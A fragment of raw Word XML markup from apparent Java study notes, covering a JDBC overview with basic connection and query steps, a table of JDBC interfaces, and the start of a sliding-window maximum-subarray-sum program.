          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC API (Application layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Interfaces like Connection, Statement, ResultSet, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDA537" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC Driver (Database layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Provided by database vendors to connect Java app to a specific DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B7EAC6" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="00000000" w:rsidP="00EC121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ED4BF76">
          <v:rect id="_x0000_i1894" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B685D2" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Core JDBC Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938A599" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Class.forName("com.mysql.cj.jdbc.Driver"); // Load driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D35D665" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Connection con = DriverManager.getConnection("jdbc:mysql://localhost:3306/db", "user", "pass");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656EA540" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Statement stmt = con.createStatement();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C669CE" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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ResultSet rs = stmt.executeQuery("SELECT * FROM employees");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5F0B5" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488026AC" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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while(rs.next()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775862EE" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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 xml:space="preserve">    System.out.println(rs.getString("name"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D84B7C" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D493D0" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E375C25" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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con.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD6B927" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="00000000" w:rsidP="00EC121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2C1D887">
          <v:rect id="_x0000_i1895" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6489F278" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Common JDBC Interfa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36"/>
        <w:gridCol w:w="4117"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="009A3DAB" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B27D59D" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC1219">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="623AB0B7" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC1219">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="346D1A8A" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="383C6CCA" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Driver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0126468C" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Interface for database drivers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="2FE5B09A" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589FE405" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08FB6887" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Manages connection to the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="6353F42D" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B4C835" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47715EF0" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Executes SQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="513F9F08" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26CB5E22" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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PreparedStatement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62E6F486" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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Executes precompiled parameterized queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC1219" w:rsidRPr="00EC1219" w14:paraId="3D4A520F" w14:textId="77777777" w:rsidTr="009544C3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C4D465" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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ResultSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A14DC0A" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC1219">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Holds results from SELECT query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EB3E082" w14:textId="1C2CA552" w:rsidR="008E5BE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009544C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19C7189">
          <v:rect id="_x0000_i1896" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="0041174E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691F494" w14:textId="77777777" w:rsidR="00022774" w:rsidRPr="00CE4B95" w:rsidRDefault="00022774" w:rsidP="00022774">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="309" w:name="_Toc196307789"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java Programs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
    </w:p>
    <w:p w14:paraId="3AEFC12B" w14:textId="77777777" w:rsidR="00022774" w:rsidRPr="00CE4B95" w:rsidRDefault="00022774">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60519201" w14:textId="0F648A98" w:rsidR="00927923" w:rsidRPr="00CE4B95" w:rsidRDefault="00927923">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="310" w:name="_Toc196307790"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00665316" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find max sum of contiguous sub array</w:t>
      </w:r>
      <w:bookmarkEnd w:id="310"/>
    </w:p>
    <w:p w14:paraId="16BF2A15" w14:textId="31CB5390" w:rsidR="006F1B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00F30BB4" w:rsidP="00927923">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a program in java to return max sum of contiguous subarray of size 3? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41FD4B" w14:textId="3D9EF8E4" w:rsidR="006F1B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00F30BB4" w:rsidP="00927923">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">(Write algorithm steps as well) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB6C420" w14:textId="108B4E28" w:rsidR="00F30BB4" w:rsidRPr="00CE4B95" w:rsidRDefault="00F30BB4" w:rsidP="00927923">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example. [2,1,5,1,3,2], where k=3 (max size of sub array)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8EAF0E" w14:textId="5823BCB8" w:rsidR="00F30BB4" w:rsidRPr="00CE4B95" w:rsidRDefault="00F30BB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AEAC51"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xSumSubarray</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C15754B"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findMaxSu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E419E3A"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Edge case: if array length is less than k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66600B0F"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length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D951F2F"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nvalid case, can't have a subarray of size k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA14A8"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5574EEB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417B57B3"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alculate sum of first window of size k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E04F0F"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windowS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3F45D4E8"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50595AE"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windowS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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C2666"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E6A105C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76029C9E"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maxS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indowS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nitialize maxSum with the sum of the first window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F5BB3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ADB712"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lide the window across the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D550D99"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2F77B2E"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ubtract the element that is leaving the window and add the one entering the window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D49F5"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windowS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k</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B2954"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Update maxSum if the new window sum is greater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D4685"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maxS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xS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indowSum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38072F56"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6AFD9FA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349F63B"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maxSum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677807ED"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2D50EC8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A4AF8D"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2EF8419"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Example array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB95AF"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k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ize of the subarray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A5C46"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD2D374"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resul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indMaxS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k</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7506E3CD"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The maximum sum of a contiguous subarray of size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k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is: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esult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E276F" w14:textId="7777777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DCF149A" w14:textId="1B211697" w:rsidR="00795A59" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C64E8" w14:textId="77777777" w:rsidR="00795A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00795A59" w:rsidP="00795A59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BED3A18" w14:textId="3BC0AB59" w:rsidR="00B72394" w:rsidRPr="00CE4B95" w:rsidRDefault="00B72394" w:rsidP="0074241D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="311" w:name="_Toc196307791"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00A00723" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00EC15B9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
